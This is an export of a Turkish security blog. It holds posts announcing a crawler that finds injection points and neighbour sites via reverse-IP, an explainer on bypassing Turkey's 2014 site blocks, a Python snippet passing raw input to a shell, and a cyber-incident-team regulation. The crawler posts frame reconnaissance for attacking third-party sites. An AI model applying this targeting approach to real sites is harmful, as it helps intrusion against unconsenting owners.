Yaklaşık 3-4 sürüm daha ilerletmeyi düşünüyoruz ve çok etkili özellikler olacaktır. Bizi izlemeye devam edin...</div>
İsmail Saygılıhttp://www.blogger.com/profile/09930086809196220105noreply@blogger.com0tag:blogger.com,1999:blog-925370819781376022.post-43457007400334681112014-03-07T16:29:00.000+02:002014-03-12T10:13:35.634+02:000x150 Web Crawler v2.0<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2pTD7cvSTRX0Roarbodjf6YG_G9YaBaBx7bygftcl5ICEFYZeXHHBIKuZsEyG5jIyXCmLpS16hshAf_3kWczfXoTmlwSMthF9S8LZg1mHXw2X65Q5jW1x2PgduUVy4jDGTn1lNpUrTD4f/s1600/web-crawler.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2pTD7cvSTRX0Roarbodjf6YG_G9YaBaBx7bygftcl5ICEFYZeXHHBIKuZsEyG5jIyXCmLpS16hshAf_3kWczfXoTmlwSMthF9S8LZg1mHXw2X65Q5jW1x2PgduUVy4jDGTn1lNpUrTD4f/s1600/web-crawler.jpg" height="200" width="178" /></a><br />
<div>
Scanner; ilk sürümünde sadece hedef olarak verilen web sitesinin inject point alanlarını tespit etmekteydi.</div>
<div>
<br /></div>
<div>
<i><b>Muhammet Dilmaç</b></i> ile 2.versiyonda Reverse-IP tekniğiyle hedef web sitenin sunucusunda barınan diğer web sitelerini keşfettirdik.</div>
<div>
Böylelikle web uygulama güvenliği testindeki hedef web sitesinde/uygulamasında herhangi bir zafiyet keşfedilemezse alternatif yollar aranabilir. Sunucuda barınan komşu siteleri tespit edip onlarda bulabileceğimiz bir zafiyet hedefi de tehlikeye sokacaktır.</div>
<div>
<br /></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2pTD7cvSTRX0Roarbodjf6YG_G9YaBaBx7bygftcl5ICEFYZeXHHBIKuZsEyG5jIyXCmLpS16hshAf_3kWczfXoTmlwSMthF9S8LZg1mHXw2X65Q5jW1x2PgduUVy4jDGTn1lNpUrTD4f/s1600/web-crawler.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"></a><br />
<div>
Ekran Görüntüsü:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEAHa9T_FkTwUPHa28AylPktv9sQal-5KBkBjVYVu_AOm8UmnPHn1a_aOujhCM2TVA-u8QgM_uWRwMdt5yvIq2t-frxaHtuI0c0yV5XXePmQWRwpiZcVc1C5abrEvUX3MUDFdNxdIW5Mka/s1600/0x150_v2.0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEAHa9T_FkTwUPHa28AylPktv9sQal-5KBkBjVYVu_AOm8UmnPHn1a_aOujhCM2TVA-u8QgM_uWRwMdt5yvIq2t-frxaHtuI0c0yV5XXePmQWRwpiZcVc1C5abrEvUX3MUDFdNxdIW5Mka/s1600/0x150_v2.0.png" height="156" width="320" /></a></div>
<div>
<br /></div>
<div>
Örnek olarak D. Kevin Mitnick'in web sitesini tarattık. Tarama sonucunda veriler iki adet text dosyasında oluşmaktadır.</div>
<div>
<i>mitnicksecurity.com_linkler.txt</i> dosyasında hedef web sitenin linkleri yer almaktadır.</div>
<div>
<i>mitnicksecurity.com_reverseip.txt</i> dosyasında hedef web sitenin sunucusunda barınan diğer siteler yer almaktadır.</div>
<div>
<br /></div>
<div>
<div>
<b><span style="color: red;">>></span> <a href="http://yadi.sk/d/_FjqS9a1K88aj" target="_blank">Programı indirmek için tıklayınız</a></b></div>
<div>
<br /></div>
<div>
<b>NOT 1:</b> Bir sonraki versiyonda sunucudaki diğer web sitelerinde de link taraması yapması planlanmaktadır.<br />
<b>NOT 2:</b> Kullanabilmeniz için <i>BeautifulSoup 4</i> ve <i>Mechanize</i> modüllerinin kurulu olması gerekmektedir.</div>
</div>
İsmail Saygılıhttp://www.blogger.com/profile/09930086809196220105noreply@blogger.com0tag:blogger.com,1999:blog-925370819781376022.post-11159689398180841192014-02-08T18:28:00.001+02:002018-10-25T15:12:42.391+03:00Yeni İnternet Yasası (2014)<div class="tr_bq">
Merhabalar, bugün sizlere <b>Eyüp ÇELİK</b>'in yazmış olduğu <b>yeni internet yasası ve engellemeler</b> hakkındaki bilgilendirici yazısını paylaşmak istedim.</div>
<br />
<blockquote>
<b><span style="color: red;">1) Eski Yasa ve Yeni Yasa Nasıl Çalışıyor?</span></b> </blockquote>
<blockquote>
Bir siteye girdiğimizde (youtube.com vb) bu site adresi DNS sunucu sayesinde IP adreslerine çevrilir. İnternet üzerindeki iletişim IP adresleri üzerinden yapılmaktadır. IP adresleri cep telefonu gibi benzersiz numaralardır. Örneğin rehberimizdeki birine telefon açmak istediğimizde, rehberimizi açıp adını yazar ve ardından arama tuşuna basarız. Oysa telefonumuz ismi değil telefon numarasını aramaktadır. İnternette de bu durum aynıdır. Bir siteye girdiğimizde, o sitenin adresi IP adresine (numaralara) çevrilir ve site görüntülenir. </blockquote>
<blockquote>
<ul>
<li><b>Eski Yasa:</b> Türkiye’deki ISP (internet sağlayıcısı) firmaları kendi kurumlarında girdiğimiz siteleri IP adresine çevirmek için DNS sunucuları kullanmaktaydılar. Bir siteye girmek istediğimizde öncelikle ISP firmasının DNS sunucusu ile iletişime geçeriz. ISP firmasında bulunan DNS sunucusu bizi hangi IP adresine yönlendirirse o siteyi açmış oluruz. Bu DNS sunucusu esas gitmemiz gereken IP adresi yerine bizi başka IP adresine yönlendirdiğinden dolayı engellenmiş sitelere erişimemekteydik. Bu yüzden DNS adresimizi ISP firmasının DNS adreslerinden farklı bir adres ile değiştirdiğimizde bu engel ortadan kaldırılmış oluyordu. </li>
<li><b>Yeni Yasa:</b> DNS sunucularının ismi (youtube.com vb) IP adresine çevirmesi, gittiği adresin engellenmesi yerine IP adresine erişim kısıtlanacaktır. Böylelikle DNS sunucusunun manipülasyonu engellenmiş olacak ve nihayetinde o siteye erişim DNS adres değişikliği ile sağlanamayacaktır. </li>
</ul>
</blockquote>
<blockquote>
<b>Engellemeler Arasındaki Farklar</b> </blockquote>
<blockquote>
Bir önceki soruda bahsettiğim gibi tüm olay DNS sunucusunun varlığı üzerinde gelişmektedir. Alan adı engellemesinde DNS sunucusu esas gitmesi gereken IP adresi yerine başka bir IP adresine yönlendirilmektedir. IP engellemesi durumunda da sitenin IP adresine erişimin tamamen kapatılması durumu söz konusudur. </blockquote>
<blockquote>
<b><span style="color: red;">2) VPN ve Proxy Yazılımları Çalışacak mı?</span></b> </blockquote>
<blockquote>
Yeni yasa ile birlikte bilinen VPN programları ve Tünelleme yazılımları malesef ki engellenecektir. Kullanıcıların bu bilinen tünelleme yazılımları ile internete çıkması yasaklanacaktır. Ancak bilinen IP adresleri değiştirildiğinde yasak atlatılmış olacaktır. </blockquote>
<blockquote>
<b>VPN’ler nasıl engellenecek?</b> </blockquote>
<blockquote>
VPN programlarının çalışmaması kısmen bu firmaların IP adreslerinin engellenmesi ve kullanmış oldukları “signature” ile yapılabilir. Ancak bu yüzde yüz engellenemez. Çünkü bu tarz yazılımlar sürekli olarak IP adresi değişirler ve bu IP adreslerine erişimin tek tek engellenmesinden yola çıkacak olursak, teknik olarak bunu yüzde yüz engelleyemezler. Kısmi bir engelleme yapılmış olur. </blockquote>
<blockquote>
<span style="color: red;"><b>3) VPN veya Proxy Sunucuları ile Yasaklı Sitelere Erişilebilecek mi?</b></span> </blockquote>
<blockquote>
Özel VPN adresleri üzerinden çıkış yapılabilecektir (Engellenmiş olanlar hariç). Örneğin çok basit bir teknikle herkes yurt dışında yayın yapan VPS / VDS gibi sanal sunucular kiralayıp, kendi VPN / Proxy sunucularını kurarak bunlar üzerinden internete çıkabilirler. Bu sanal sunucular aylık 15-20 lira gibi küçük ücretler ile herkes tarafından alınabilir. Hatta bu sunucular üzerine proxy sunucusu roller kurularak başkalarının da internete çıkması sağlanabilir. Alınan bu sunucunun IP adresinin engellenmesi durumunda başka bir ülkeden başka bir IP adresine sahip yeni bir sunucu kiralanabilir. Aksi durumda bu tarz yazılımların ve işlemlerin engellenmesi ancak Türkiye dışındaki tüm sistemlere erişimin kapatılması ile mümkün olabilir. Türkiye dışındaki tüm ülkelere erişim kapatılmadığı sürece bu yöntemler ile erişimler tamamen engellenemez. </blockquote>
<blockquote>
<b><span style="color: red;">4) Siteler Tamamen Engellenmeyecek, Bunun Yerine Sadece Sayfalar mı Engellenecek?</span></b> </blockquote>
<blockquote>
Site sayfalarının engellenmesi ancak sitede bulunan bütün linklerin ISP firmaları tarafından işlenmesi ile yapılabilir. Bu noktada aslında yapılan işin rengi çok değişmiş oluyor. Çünkü bu sayfa engellemesi işlemini yapabilmek için kullanıcıların görüntülediği tüm sayfaların kayıt altına alınması sayesinde yapılabilir. Yani aslında bu durumda internette girdiğimiz her sayfa kayıt altına alınmış olacak. Hali ile bu sanal bir fişleme olarakta düşünülebilir. Çünkü hangi kullanıcının hangi sayfaya gittiği görülebilecektir. </blockquote>
<blockquote>
<b>Bu engelli sayfalara VPN veya Proxy ile erişilebilecek mi?</b> </blockquote>
<blockquote>
Bu sayfa bazında kısıtlama yapmakla mümkündür. Ancak VPN veya Tünelleme yazılımları ile bu engelleme işlemi aşılabilecektir. </blockquote>
<blockquote>
<b><span style="color: red;">5) Bu İş Başka Ülkelerde Nasıl İşliyor?</span></b> </blockquote>
<blockquote>
Başka ülkelerde erişim benzer şekilde engellenmektedir. Ancak Avrupa ülkelerinde daha çok çocuk pornosu ve benzeri yayınlar engellenmektedir. Ülkemizde bugün 40.000 den fazla web sitesine erişim engellenmiş durumdadır. Bu sayı Avrupa’daki engellemelerin toplamından bile çok daha fazladır. Ülkemizde bu engelleme artık engellemeden öte sansürlemeye dönüşmüş durumdadır. Çünkü bir web sitesinin engellenmesi suçu işleyen siteyi değil o siteye giren kullanıcıyı cezalandırmaktadır. </blockquote>
<blockquote>
<b>En çok engelleyen ülkelerde nasıl oluyor?</b> </blockquote>
<blockquote>
Çin’de ve İran’da yasaklar söz konusu ancak Çin’deki yasaklar bizim internet yasaklarımız kadar çok değil. İnternet yasakları Kuzey Kore ve İran’da daha fazladır. İran kendisine uygulanan ambargo ve dış saldırılardan dolayı dış dünyaya iletişim sağlamamaktadır. Benzer şekilde Kuzey Kore’de zaman zaman internet erişimini durdurmaktadır. </blockquote>
<blockquote>
<b>Yeni yasa ile biz nasıl olacağız?</b> </blockquote>
<blockquote>
Yeni yasa bizi büyük oranda bu ülkelere yaklaştıracaktır. Ve bu hali ile yeni yasa by-pass edildikten sonra birileri internetin tamamen kapatılması yönünde kanun teklifleri vereceği beklenmektedir. Bu internetin kapatılması durumu da diğer ülkelere benzememizi sağlayacaktır. </blockquote>
<blockquote>
<b><span style="color: red;">6) Yeni Sistemin Engelleri Aşılabilecek mi?</span></b> </blockquote>
<blockquote>
Aslında internette aşılmayacak bir sistemin olması çok zor. Yeni yasa ile engeller önceki sorularda belirttiğim şekillerde aşılabilecektir. Yasaklar her zaman yeni yolların bulunması anlamına gelmektedir. </blockquote>
<blockquote>
<b>Engelli sitelere proxy yazılımları ile erişilebilecek mi?</b> </blockquote>
<blockquote>
Evet benzer yazılımlar kullanılabilecektir. Ancak engellemeler IP bağımlı yapıldıktan sonra engellemeye takılmayan IP adresleri ve yazılımlar üzerinden engellemeler by-pass edilebilecektir. </blockquote>
<blockquote>
<b><span style="color: red;">7) ISP (Servis Sağlayıcıları) Firmaları Ziyaret Ettiğimiz Her Siteyi Kayıt Altına Alacak mı? Sistem Nasıl İşleyecek?</span></b> </blockquote>
<blockquote>
<b>Bu durumda VPN veya TOR kullanarak ziyaret edilen siteyi servis sağlayıcılarından saklamak mümkün mü?</b> </blockquote>
<blockquote>
Evet mümkündür. Zaten bu bir nevi sanal fişleme olacaktır. Kimin hangi adrese girdiği, neyi seyrettiği, en çok nerelerde zaman geçirdiği, hangi sıklıkla ziyaretler gerçekleştirdiği gibi bilgiler saklanacaktır. VPN veya TOR benzeri yazılımlar kullanıldığında da benzer loglar tutulmuş olacak fakat gerçek IP adresi ile gidilmediğinden tutulan loglar gerçek bir kişiye ait bilgiler tutulmamış olacaktır. </blockquote>
<blockquote>
<b><span style="color: red;">8) VPN veya Proxy Yazılımlardan Başka Alternatifler Var mı?</span></b> </blockquote>
<blockquote>
Evet var. Kişinin VPS / VDS gibi sanal sunucular ile kendine özel VPN yapısı kurması, Amazon’da bulunan Cloud sunucularının tünelleme sunucuları haline getirilerek kullanılması, ücretli proxy servisleri gibi bir çok yöntem ile bu engeller rahatlıkla aşılabilecektir. İnternete çıkan hiç bir bilgisayar yüzde yüz engellenemez.</blockquote>
İsmail Saygılıhttp://www.blogger.com/profile/09930086809196220105noreply@blogger.com0tag:blogger.com,1999:blog-925370819781376022.post-1650610548986420332014-02-03T15:59:00.003+02:002014-02-03T16:09:52.690+02:000x150 Web Crawler<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2pTD7cvSTRX0Roarbodjf6YG_G9YaBaBx7bygftcl5ICEFYZeXHHBIKuZsEyG5jIyXCmLpS16hshAf_3kWczfXoTmlwSMthF9S8LZg1mHXw2X65Q5jW1x2PgduUVy4jDGTn1lNpUrTD4f/s1600/web-crawler.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2pTD7cvSTRX0Roarbodjf6YG_G9YaBaBx7bygftcl5ICEFYZeXHHBIKuZsEyG5jIyXCmLpS16hshAf_3kWczfXoTmlwSMthF9S8LZg1mHXw2X65Q5jW1x2PgduUVy4jDGTn1lNpUrTD4f/s1600/web-crawler.jpg" height="120" width="140" /></a></div>
Web uygulama güvenliği testlerinin temeli aslında en önemli aşamalarından olan <i>inject point</i> alanlarını keşfetmeyi kolaylaştırıcı, Python ile kendim için yazdığım basit bir <b>web crawler/spider</b> programını sizlerle paylaşmak istedim.<br />
<div>
<br /></div>
<div>
<b>Web Crawler/Spider</b>'in bu programdaki görevi; hedef olarak verilen web sitenin/uygulamanın içinde link takibi yaparak inject point alanlarını bulmaktır.<br />
<br />
..Sonrasında ise hacker, bulunan bu inject point alanlarına çeşitli web hacking yöntemleri (<b>sql injection</b>, <b>xss</b>, <b>lfi</b>, <b>rfi</b>, <b>rce</b> vs.) kullanarak ileri ki adımlara geçiş yapabilir.<br />
<br />
Çalışma sırasından görüntüler:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTTVTkaamYLucqIj3bpI82ormz8cqVl4U33odmHh9TanSW3EZ6qTtVlV8T1rRlEGCd36YWPWSda0gO1grgUKz1F1wPTPHDVmHJpQFA07xuGh-xC_MaNxX1XZulOggcOUfrupmUQdsS7HBo/s1600/web-spider-crawler1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTTVTkaamYLucqIj3bpI82ormz8cqVl4U33odmHh9TanSW3EZ6qTtVlV8T1rRlEGCd36YWPWSda0gO1grgUKz1F1wPTPHDVmHJpQFA07xuGh-xC_MaNxX1XZulOggcOUfrupmUQdsS7HBo/s1600/web-spider-crawler1.png" height="170" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPBnQIM6L-5LEbQvb_Cz02XtY-XUeT9cBFiHo1TK7qJVzWNv9-3EkEsjvZKMdyK37rKZ95Q_uGKrQDTNod65C6pN3X2vdQ0DICTp5-An9qXjabNC_QargJYeAo9eR1Raj7IOPZm7uE4Gg5/s1600/web-spider-crawler2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPBnQIM6L-5LEbQvb_Cz02XtY-XUeT9cBFiHo1TK7qJVzWNv9-3EkEsjvZKMdyK37rKZ95Q_uGKrQDTNod65C6pN3X2vdQ0DICTp5-An9qXjabNC_QargJYeAo9eR1Raj7IOPZm7uE4Gg5/s1600/web-spider-crawler2.png" height="320" width="273" /></a></div>
<br />
<b><span style="color: red;">>></span> <a href="http://yadi.sk/d/_Gv-34bXHEWDJ" target="_blank">Programı indirmek için tıklayınız</a></b></div>
<div>
<br /></div>
<div>
<b>NOT:</b> Kullanabilmeniz için <i>BeautifulSoup 4</i> ve <i>Mechanize</i> modüllerinin kurulu olması gerekmektedir.</div>
İsmail Saygılıhttp://www.blogger.com/profile/09930086809196220105noreply@blogger.com5tag:blogger.com,1999:blog-925370819781376022.post-69685938632098671702014-01-07T13:19:00.003+02:002018-10-25T15:13:49.854+03:00Python ile Linux Komut Çıktısı KaydetmeMerhaba arkadaşlar, biliyorsunuz arada Python'la ilgili basit ancak işimize yarayacak paylaşımlar yapıyorum. Bugün sizlerle Python ile Linux komut çıktılarını bir metin (txt) dosyasına kaydettirme örneği paylaşacağım.<br />
<div>
<br /></div>
<div>
<div>
Kod örneği aşağıdaki gibidir:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
<i><span style="color: #660000;">#!/usr/bin/env python</span></i> </blockquote>
<blockquote class="tr_bq">
<i><span style="color: #660000;">#-*- coding: cp1254 -*-</span></i> </blockquote>
<blockquote class="tr_bq">
<i><span style="color: orange;">import </span>subprocess</i> </blockquote>
<blockquote class="tr_bq">
<i>komut = <span style="color: orange;">raw_input</span>(<span style="color: #6aa84f;">"Komutu giriniz: "</span>)</i> </blockquote>
<blockquote class="tr_bq">
<i>islem = subprocess.Popen(komut, shell = <span style="color: #6aa84f;">True</span>, stdout = subprocess.PIPE)</i><i>cikti = islem.communicate()[<span style="color: #6aa84f;">0</span>]</i> </blockquote>
<blockquote class="tr_bq">
<i>dosyaismi = komut+<span style="color: #6aa84f;">".txt"</span></i><i>dosya = <span style="color: orange;">open</span>(dosyaismi, <span style="color: #6aa84f;">"w"</span>)</i><i>dosya.write(cikti)</i><i>dosya.close()</i></blockquote>
</div>
</div>
<div>
<br /></div>
<div>
Yazılan kodları açıklamak gerekirse;</div>
<div>
<ul>
<li>Öncelikle Python'da komut satırı işlemlerini <b>subprocess </b>modülünü import ederek yaptırabiliriz (farklı modüller de mevcuttur..)</li>
<li>Programı çalıştırdığımızda vereceğimiz komutu <b>raw_input</b> ile istedik ve <b>komut </b>değişkenine atadık</li>
<li><b>subprocess </b>modülünü kullanarak komut satırını aktifleştirip <b>islem </b>isimli değişkene atadık</li>
<li><b>islem </b>isimli değişkende işlemleri yapan subprocess modülünün <b>communicate </b>methoduyla işlem çıktılarını <b>cikti </b>isimli değişkene atadık</li>
<li>İlk başlarda <b>raw_input </b>ile kullanıcıdan aldığımız komutun ismiyle bir txt dosyası oluşturacak şekilde <b>dosyaismi </b>değişkenini tanımladık</li>
<li>Son olarak dosya işlemlerine geçiyoruz, verilen komut ismiyle bir txt dosyası açıyoruz</li>
<li><b>cikti </b>değişkeninin oluşturduğu içeriği dosyamıza yazdık ve dosyayı kapattık</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgOKPIpAYY09S05AKQsnU1xsDi1yJA85wcOuqIinalaSahw_ApWKoqzxqY2fNg8-vysa-la215PcAPkPaJbBRNtDQTIdljNUJBgPSHdmWq7marWnI4DLr2dzwbinV14G4oU4NQpVQ3r-tO/s1600/python-linx-command1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgOKPIpAYY09S05AKQsnU1xsDi1yJA85wcOuqIinalaSahw_ApWKoqzxqY2fNg8-vysa-la215PcAPkPaJbBRNtDQTIdljNUJBgPSHdmWq7marWnI4DLr2dzwbinV14G4oU4NQpVQ3r-tO/s1600/python-linx-command1.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAcKhzCAq04msJoSMOAqY7gXxBxMjrApeFI9OuL7I87OkT7FIZeODdGh8LvauzXM1vFXAS1aRRjalLizCVwk1FQsiSOthqFe6mf_D4ZzfiPU_5DZGyXcJPAZBuimW9m1Nx_a2YdxmVoULq/s1600/python-linx-command2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="145" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAcKhzCAq04msJoSMOAqY7gXxBxMjrApeFI9OuL7I87OkT7FIZeODdGh8LvauzXM1vFXAS1aRRjalLizCVwk1FQsiSOthqFe6mf_D4ZzfiPU_5DZGyXcJPAZBuimW9m1Nx_a2YdxmVoULq/s1600/python-linx-command2.png" width="320" /></a></div>
<div>
<br /></div>
</div>
İsmail Saygılıhttp://www.blogger.com/profile/09930086809196220105noreply@blogger.com0tag:blogger.com,1999:blog-925370819781376022.post-47999166109588567732013-12-29T19:14:00.000+02:002013-12-29T19:16:46.417+02:00SOME ve USOM'un Kuruluş, Görev ve Çalışmalarına Dair Usul ve Esaslar Tebliği<h4>
<u>
Siber Olaylara Müdahale Ekiplerinin Kuruluş, Görev ve Çalışmalarına Dair Usul ve Esaslar Hakkında Tebliğ</u></h4>
<b>BİRİNCİ BÖLÜM</b><br />
<b>Amaç ve Kapsam, Dayanak, Tanımlar</b><br />
<b><br /></b>
<b>Amaç ve Kapsam</b><br />
<b>MADDE 1</b> − (1) Bu Tebliğin amacı ve kapsamı, Siber Olaylara Müdahale Ekiplerinin kuruluş, görev ve çalışmalarına ilişkin usul ve esaslarını belirleyerek, hizmetlerin etkin ve verimli bir şekilde yürütülmesini sağlamaktır.<br />
<br />
<b>Dayanak</b><br />
<b>MADDE 2 </b>− (1) Bu Tebliğ, 20/10/2012 tarihli ve 28447 sayılı Resmî Gazete’de yayımlanan 2012/3842 sayılı Bakanlar Kurulu Kararıyla yürürlüğe konulan Ulusal Siber Güvenlik Çalışmalarının Yürütülmesi, Yönetilmesi ve Koordinasyonuna İlişkin Kararın 5 inci maddesinin birinci fıkrasının (ç) bendi ile üçüncü fıkrası ve 25/3/2013 tarihli ve 2013/4890 sayılı Bakanlar Kurulu Kararıyla yürürlüğe konulan Ulusal Siber Güvenlik Stratejisi ve 2013-2014 Eylem Planının 4 üncü maddesi ve 655 sayılı Ulaştırma, Denizcilik ve Haberleşme Bakanlığının Teşkilat ve Görevleri Hakkında Kanun Hükmünde Kararnamenin 29 uncu maddesinin yedinci fıkrası ile 30 uncu maddesine dayanılarak hazırlanmıştır.<br />
<br />
<b>Tanımlar</b><br />
<b>MADDE 3</b> − (1) Bu Tebliğde geçen;<br />
<b>a)</b> Bilişim Sistemleri: Bilgi ve iletişim teknolojileri vasıtasıyla sağlanan her türlü hizmet, işlem, veri ve bunların sunumunda yer alan sistemleri,<br />
<b>b)</b> Endüstriyel Kontrol Sistemi: Geleneksel bilişim teknolojileri dışında, programlanabilir mantıksal denetleyiciler aracılığı ile üretim, ürün işleme ve dağıtım kontrolleri gibi endüstriyel işlemler için kullanılan bilgi sistemleridir. Bu sistemler Veri Tabanlı Merkezi Kontrol ve Gözetleme Sistemi (SCADA) ile coğrafi olarak Dağınık Kontrol Sistemleri (DKS) şeklinde gruplanmaktadır.<br />
<b>c)</b> Kritik Altyapılar: İşlediği bilginin gizliliği, bütünlüğü veya erişilebilirliği bozulduğunda, can kaybına, büyük ölçekli ekonomik zarara, ulusal güvenlik açıklarına veya kamu düzeninin bozulmasına yol açabilecek bilişim veya endüstriyel kontrol sistemlerini barındıran altyapıları,<br />
<b>ç)</b> Kritik Sektörler: Kritik altyapıları bünyesinde barındıran sektörleri,<br />
<b>d)</b> Kurul: Siber Güvenlik Kurulunu,<br />
<b>e)</b> Siber Olay: Bilişim ve endüstriyel kontrol sistemlerinin veya bu sistemler tarafından işlenen bilginin gizlilik, bütünlük veya erişilebilirliğinin ihlal edilmesini veya teşebbüste bulunulmasını,<br />
<b>f)</b> Siber Olaya Müdahale: Bilişim ve endüstriyel kontrol sistemlerinin veya bu sistemlerde tutulan veya işlenen verilerin gizlilik, bütünlük ve erişilebilirliğinde meydana gelme riski bulunan veya meydana getiren siber olayın kaynağını, nedenlerini ve sonuçlarını tespit ederek siber olayın devam etmesini, tekrarını veya zarar vermesini önleyen çalışmaları,<br />
<b>g)</b> SOME: Siber Olaylara Müdahale Ekibini,<br />
<b>ğ)</b> USOM: Ulusal Siber Olaylara Müdahale Merkezini,<br />
ifade eder.<br />
<br />
<a name='more'></a><br /><br />
<b>İKİNCİ BÖLÜM</b><br />
<b>SOME’lerin Kuruluşu, Yapısı, Görev ve Yükümlülükleri, USOM’la İlişkileri</b><br />
<b><br /></b>
<b>Kurumsal SOME’lerin Kuruluşu</b><br />
<b>MADDE 4</b> − (1) Kurumsal SOME’ler Bakanlıkların bünyesinde, hizmet gereklerine göre, Bakanlık birimlerini, bağlı, ilgili ve ilişkili kurumlarını kapsayacak şekilde kurulur. Ancak Bakanlık koordinesinde Bakanlık birimleri, bağlı, ilgili ve ilişkili kurum ve kuruluşları altyapılarının önem ve büyüklüğüne göre kendi bünyelerinde bir kurumsal SOME kurabilirler.<br />
(2) Diğer tüm kamu kurum ve kuruluşları kendi bünyelerinde kurumsal SOME kurabilirler.<br />
(3) Bakanlıkların merkez birimleri, bağlı, ilgili ve ilişkili kurum ve kuruluşlarının yanı sıra 10/12/2003 tarihli ve 5018 sayılı Kamu Malî Yönetimi ve Kontrol Kanununa ekli I, II, III ve IV sayılı cetvellerde yer alan kurum ve kuruluşlar da kendi bünyelerinde kurumsal SOME kurabilirler.<br />
(4) Kurumsal SOME’lerin kuruluşunun eşgüdümü Ulaştırma, Denizcilik ve Haberleşme Bakanlığı tarafından yürütülür.<br />
(5) Sektörel SOME’lerin bulunduğu sektörlerdeki özel kurumlar ve diğer kuruluşlar kendi bünyelerinde kurumsal SOME kurabilirler.<br />
<br />
<b>Kurumsal SOME’lerin Görev ve Sorumlulukları</b><br />
<b>MADDE 5</b> − (1) Kurumsal SOME’ler kurumlarına doğrudan ya da dolaylı olarak yapılan veya yapılması muhtemel siber saldırılara karşı gerekli önlemleri alma veya aldırma, bu tür olaylara karşı müdahale edebilecek mekanizmayı ve olay kayıt sistemlerini kurma veya kurdurma ve kurumlarının bilgi güvenliğini sağlamaya yönelik çalışmaları yapmak veya yaptırmakla yükümlüdürler.<br />
(2) Kurumsal SOME’ler, siber olayların önlenmesi veya zararlarının azaltılmasına yönelik olarak, kurumlarının bilişim sistemlerinin kurulması, işletilmesi veya geliştirilmesi ile ilgili çalışmalarda teknik ve idari tedbirler konusunda öneri sunarlar.<br />
(3) Kurumsal SOME’ler, siber olayların önlenmesi veya zararlarının azaltılmasına yönelik faaliyetlerini varsa birlikte çalıştığı sektörel SOME ile eşgüdüm içerisinde yürütürler. Durumdan gecikmeksizin USOM’u haberdar ederler.<br />
(4) Kurumsal SOME’ler bir siber olayla karşılaştıklarında, USOM ve birlikte çalıştığı sektörel SOME’ye bilgi vermek koşulu ile öncelikle söz konusu olayı kendi imkân ve kabiliyetleri ile bertaraf etmeye çalışırlar. Bunun mümkün olmaması halinde varsa birlikte çalıştığı sektörel SOME’den ve/veya USOM’dan yardım talebinde bulunabilirler.<br />
(5) Kurumsal SOME’ler siber olaya müdahale ederken suç işlendiği izlenimi veren bir durumla karşılaştıklarında gecikmeksizin durumu kanunen yetkili makamlara bildirirler. Durumu gecikmeksizin USOM’a da bildirirler.<br />
(6) Kurumsal SOME’ler kurumlarına yapılan siber olayları raporlar ve gecikmeksizin USOM ve birlikte çalıştığı sektörel SOME’ye bildirirler.<br />
(7) Kurumsal SOME’ler USOM ve/veya birlikte çalıştığı sektörel SOME tarafından iletilen siber olaylara ilişkin alarm, uyarı ve duyuruları dikkate alarak kurumlarında gerekli tedbirleri alırlar.<br />
(8) Kurumsal SOME’ler 7/24 erişilebilir olan iletişim bilgilerini belirleyerek birlikte çalıştığı sektörel SOME’lere ve USOM’a bildirirler.<br />
<br />
<b>Sektörel SOME’lerin Kuruluşu</b><br />
<b>MADDE 6</b> − (1) Sektörel SOME’ler düzenleyici ve denetleyici kurumların bünyesinde kendi sektörlerinde faaliyet gösteren kurum, kuruluş ve işletmeleri kapsayacak şekilde kurulur.<br />
(2) İhtiyaç duyulması halinde, düzenleyici ve denetleyici kurumların yetki alanı dışında kalan diğer sektörlerde ilgili olduğu Bakanlık bünyesinde sektörel SOME kurulabilir.<br />
(3) Kritik sektörlerde, sektörel SOME kurulması zorunludur. Kritik sektörlerin listesi Kurul tarafından belirlenir, ilgililere duyurulur ve güncellenir.<br />
(4) Düzenleyici ve denetleyici kurumlardaki sektörel SOME’lerin eşgüdümü Bilgi Teknolojileri ve İletişim Kurumu (BTK) tarafından yürütülür.<br />
<br />
<b>Sektörel SOME’lerin Görev ve Sorumlulukları</b><br />
<b>MADDE 7</b> − (1) Sektörel SOME’ler, siber olayların önlenmesi veya zararlarının azaltılmasına yönelik faaliyetlerini USOM’la koordineli şekilde yürütürler.<br />
(2) Sektörel SOME’ler birlikte çalıştıkları SOME’lerde yaşanan siber olayları gecikmeksizin USOM’a bildirirler.<br />
